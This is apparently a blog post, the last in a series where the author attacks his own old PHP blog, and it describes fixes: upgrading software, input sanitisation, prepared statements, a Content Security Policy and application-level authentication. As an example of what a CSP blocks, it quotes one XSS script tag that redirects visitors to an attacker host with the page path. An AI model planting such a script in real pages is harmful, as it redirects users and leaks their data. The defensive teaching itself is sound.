Hacking my old blog: part 4, security fixes
To finish off the series, I discuss some of the mechanisms that could have been used to protect my old blog.
I've had fun writing this series and it seems fitting to finish by covering some of the fixes that could be put in place to resolve the issues that have been found. As I'm not planning to put the old code into use I'll be discussing these fixes hypothetically.
Upgrade old software
Right at the beginning of the series I highlighted how I wasn't able to run the old code on a modern version of PHP. As a result I had to find something old to work with but, as a general rule, that should never happen in a production environment. Having unsupported, outdated, software in a production environment can leave you open to major issues. For example, if PHP version 5.3 was found to have a significant flaw today that allowed direct access to the server, numerous sites using the unsupported PHP 5.3 would be impacted. No fix would be forthcoming. The same is true with Windows XP, Vista and Seven - all now unsupported but still in use in some environments.
My first recommendation would be to upgrade the software, starting with the web application. To fix this blog would be a reasonably large undertaking as the database access method (the mysql_connect()
function) and subsequent query functions would need replacing. It's unlikely this would be a simple case of find and replace!
As you can imagine, going through the old code and rewriting it is going to take time, and the bigger the application the more time it would take. If you're a developer I'd recommend that you spend time testing your application with newer versions of the software you depend on (PHP in my case, but equally could be Windows itself) before the newer version is released to the public. By knowing what changes are coming, and ensuring your code works with them, you can hit the ground running when a new version comes out - potentially that puts you ahead of the competition. You may think that sounds obvious (it is) but it's amazing how many suppliers I've dealt with that don't support the latest (or even previous latest) version of something.
That reminds me, I need to test eVitabu with PHP 8.0...
Sanitise input
I touched on this in part three. The sad yet key message is that you cannot trust user provided input. As I wrote in my Masters' certificate (1st stage) project, during the early years of Microsoft they didn't expect users to attack the system [1] so didn't much protect against it - no sanitisation. Similarly, I wasn't expecting anyone to attack my blog ("little old me") so didn't really code in any protections.
Cross Site Scripting (XSS) can be protected against, at a very basic level, by using PHP's htmlentities()
function. It should be noted that this isn't a complete protection, and shouldn't be relied upon, but it would have been a start. I would recommend not "rolling your own" sanitisation routine though. Find a code framework that offers to sanitise input and use that.
SQL injection can be protected against by using parameterised queries also sometimes called prepared statements. PHP has a manual page on these, but essentially the query is designed early on with the required parameters inserted at runtime. This sounds similar to what I was already doing, but the key difference is that all the quoting, placing ' around the data, is handled differently and, in theory, if only prepared statements are used it's not possible to suffer SQL injection.
I was lucky that SQL injection didn't trigger on my old blog, purely because multiple queries weren't supported:
mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier
.
Content Security Policy
As an additional protection, given that defence in depth [2] is always a good idea, it would be wise to apply a content security policy (CSP). Now, I'll point out that CSPs were not around when my old code was in use, however, if that code had to go back into production a CSP would help massively.
Scott Helme does a good job of explaining CSPs in his introductory blog post on the subject, so I won't attempt to reinvent the wheel. Scott really knows his stuff. In summary though, the CSP is a set of rules that tell the browser what to run, be that scripts or images to load. You really should read Scott's post, as I've barely scratched the surface with that summary.
A CSP would have been useful because I could have said "only run scripts served from blog.jonsdocs.org.uk" and that does not include embedded scripts like this:
<script>window.location.href = "http://attacker.jonsdocs.org.uk/?source="+window.location.pathname;</script>
For that embedded script to run the CSP would have to allow unsafe-inline
scripts. A CSP could have been used to avoid the embedded image too.
Implement application level authentication
I gained access directly to the admin back end as soon as I knew its address because the authentication was all handled by the web server. My restored blog didn't have the web server configuration to lock down access, thus we were straight in. Rather than relying on another system (the web server Apache 2 in this case), if the application itself had been configured to authenticate users then the restored application would have left us locked out.
While I'm talking about authentication it would be remiss of me to not mention multi-factor authentication. By requiring a token code, or security key, to log in to the back end it would have been possible to protect against credential theft too.
Conclusions
It's been a fun exercise looking at my old code and seeing how I could attack, then defend it. I'm pleased to say since I wrote that code I've learnt a lot and don't make the same mistakes. Nonetheless, I know sometimes I will write insecure code (not intentionally) so it's always good to reflect on my work and review it with a colleague.
Banner image: "Cartoon Comic Fort Fortress Stronghold Castle" by qubodup on OpenClipart.org
[1] The book I found that out in is Beautiful Security which is a collection of security essays. Really interesting read. For those of you familiar with Harvard referencing:
Zatko, P.M. (2009). Psychological Security Traps. In: Oram, A & Viega, J (eds.). Beautiful Security. United States of America: O’Reilly Media.
[2] Defence in depth is the practice of having multiple layers of defence, rather than relying on a single mechanism. The idea is that different layers complement each other, and have different weaknesses. An attacker would need to compromise each layer in order for their attack to be successful.